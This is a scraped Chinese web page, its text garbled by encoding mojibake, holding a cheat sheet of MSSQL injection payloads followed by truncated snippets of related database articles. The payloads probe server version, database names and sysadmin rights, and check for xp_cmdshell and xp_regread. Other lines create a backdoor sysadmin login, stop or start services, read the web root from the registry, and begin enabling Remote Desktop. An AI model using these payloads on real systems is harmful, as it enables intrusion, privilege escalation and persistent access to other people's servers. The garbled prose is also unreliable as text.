Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

sql×¢Èë³£ÓÃÓï¾ä

and exists (select * from sysobjects) //ÅжÏÊÇ·ñÊÇMSSQL and exists(select * from tableName) //ÅжÏij±íÊÇ·ñ´æÔÚ..tableNameΪ±íÃû and 1=(select @@VERSION) //MSSQL°æ±¾ And 1=(select db_name()) //µ±Ç°Êý¾Ý¿âÃû and 1=(select @@servername) //±¾µØ·þÎñÃû and 1=(select IS_SRVROLEMEMBER('sysadmin')) //ÅжÏÊÇ·ñÊÇϵͳ¹ÜÀíÔ± and 1=(Select IS_MEMBER('db_owner')) //ÅжÏÊÇ·ñÊÇ¿âȨÏÞ and 1= (Select HAS_DBACCESS('master')) //ÅжÏÊÇ·ñÓпâ¶ÁȡȨÏÞ and 1=(select name from master.dbo.sysdatabases where dbid=1) //±©¿âÃûDBIDΪ1£¬2£¬3.... ;declare @d int //ÊÇ·ñÖ§³Ö¶àÐÐ and 1=(Select count(*) from master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //ÅжÏXP_CMDSHELLÊÇ·ñ´æÔÚ and 1=(select count(*) from master.dbo.sysobjects where name= 'xp_regread') //²é¿´XP_regreadÀ©Õ¹´æ´¢¹ý³ÌÊDz»ÊÇÒѾ­±»É¾³ý Ìí¼ÓºÍɾ³ýÒ»¸öSAȨÏÞµÄÓû§test£º£¨ÐèÒªSAȨÏÞ£©
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin Í£µô»ò¼¤»îij¸ö·þÎñ¡£ £¨ÐèÒªSAȨÏÞ£©
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule' ±©ÍøÕ¾Ä¿Â¼
create table labeng(lala nvarchar(255), id int) DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result); and 1=(select top 1 lala from labeng) »òÕßand 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————·Ö¸î DOSÏ¿ª3389 ²¢Ð޸Ķ˿ںÅ
sc config termservice start= auto net start termservice //ÔÊÐíÍâÁ¬
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo


Ïà¹ØÎĵµ£º

ʹÓÃSQL SERVER´æ´¢¹ý³ÌʵÏÖÒøÐÐתÕËÒµÎñ

ÔÚÒøÐнðÈÚϵͳÖУ¬ÎÒÃdz£³£¶¼ÒªÊµÏÖÒøÐÐתÕËÕâÑùµÄÒµÎñ²Ù×÷£¬¶øÕâÖÖ½ðÈÚϵͳ²¢·¢ÐÔÏ൱¸ß£¬ÐèÒª¿¼ÂǵÄÈçºÎÌá¸ßÐÔÄܺͱ£Ö¤°²È«ÐÔµÈÏà¹ØµÄÎÊÌ⡣ʹÓô洢¹ý³ÌÀ´ÊµÏÖÒøÐÐתÕËÊÇÒ»¸öºÜºÃµÄÑ¡Ôñ¡£
SQL SERVERÊý¾Ý¿âÖеĴ洢¹ý³ÌÏà¶ÔÓÚÓ¦ÓóÌÐòÖÐÀ´²Ù×÷Transact-SQLÓïÑÔµÄÓÅȱµã£º
Óŵ㣺
1.     & ......

SQL×¢Èë©¶´È«½Ó´¥

 
µÚÒ»½Ú¡¢SQL×¢ÈëµÄÒ»°ã²½Öè
Ê×ÏÈ£¬Åжϻ·¾³£¬Ñ°ÕÒ×¢Èëµã£¬ÅжÏÊý¾Ý¿âÀàÐÍ£¬ÕâÔÚÈëÃÅÆªÒѾ­½²¹ýÁË¡£
Æä´Î£¬¸ù¾Ý×¢Èë²ÎÊýÀàÐÍ£¬ÔÚÄÔº£ÖÐÖØ¹¹SQLÓï¾äµÄԭò£¬°´²ÎÊýÀàÐÍÖ÷Òª·ÖΪÏÂÃæÈýÖÖ£º
(A) ID=49 ÕâÀà×¢ÈëµÄ²ÎÊýÊÇÊý×ÖÐÍ£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select * from ±íÃû where ×Ö¶Î=49
×¢ÈëµÄ²ÎÊýΪID=49 And [²é ......

SQLÖÐÈçºÎÕýÈ·ÈÏʶ´¥·¢Æ÷

¶ÔÓÚ³õѧÕß¶Ô´¥·¢Æ÷µÄÀí½âÍùÍù²»ÊǺÜ͸³¹£¬¼ÇµÃ×Ô¼ºµ±³õѧµÄʱºò×ÜÓеãÃþ²»ÇåÍ·ÄԵĸоõ£¬½ñÌì¾ÍÏëÆðºÍ´ó¼Ò×ܽáһϣ¬Èç¹ûÎÄÕ³öÏÖЩ覴ÃÇë¸ßÊÖ¶à¶àÖ¸½ÌŶ£¡
´¥·¢Æ÷ÊÇÊý¾Ý¿â·þÎñÆ÷Öз¢Éúʼþʱ×Ô¶¯Ö´ÐеÄÌØÊâ´æ´¢¹ý³Ì£¬Ëü²åÈ롢ɾ³ý»òÐÞ¸ÄÌØ±íÖеÄÊý¾Ýʱ´¥·¢Ö´ÐС£´¥·¢Æ÷ͨ³£¿ÉÒÔÇ¿ÖÆÖ´ÐÐÒ»¶¨µÄÒµÎñ¹æÔò£¬ÒÔ±£³ÖÊý¾ÝÍêÕûÐÔ ......

sql×Ö·û´®Ä£Ê½Æ¥Åä

 MySQLÌṩ±ê×¼µÄSQLģʽƥÅ䣬ÒÔ¼°Ò»ÖÖ»ùÓÚÏóUnixʵÓóÌÐòÈçvi¡¢grepºÍsedµÄÀ©Õ¹ÕýÔò±í´ïʽģʽƥÅäµÄ¸ñʽ¡£ ±ê×¼µÄSQLģʽƥÅä
SQLµÄģʽƥÅäÔÊÐíÄãʹÓÓ_”Æ¥ÅäÈκε¥¸ö×Ö·û£¬¶ø“%”Æ¥ÅäÈÎÒâÊýÄ¿×Ö·û(°üÀ¨Áã¸ö×Ö·û)¡£ÔÚ MySQLÖУ¬SQLµÄģʽȱʡÊǺöÂÔ´óСдµÄ¡£ÏÂÃæÏÔʾһЩÀý×Ó¡£×¢ÒâÔÚÄãÊ ......

SQLÓï¾ä

 --Óï ¾ä ¹¦ ÄÜ
--Êý¾Ý²Ù×÷
SELECT --´ÓÊý¾Ý¿â±íÖмìË÷Êý¾ÝÐкÍÁÐ
INSERT --ÏòÊý¾Ý¿â±íÌí¼ÓÐÂÊý¾ÝÐÐ
DELETE --´ÓÊý¾Ý¿â±íÖÐɾ³ýÊý¾ÝÐÐ
UPDATE --¸üÐÂÊý¾Ý¿â±íÖеÄÊý¾Ý
--Êý¾Ý¶¨Òå
CREATE TABLE --´´½¨Ò»¸öÊý¾Ý¿â±í
DROP TABLE --´ÓÊý¾Ý¿âÖÐɾ³ý±í
ALTER TABLE --ÐÞ¸ÄÊý¾Ý¿â±í½á¹¹
CREATE VIEW --´´½¨Ò»¸öÊÓÍ ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ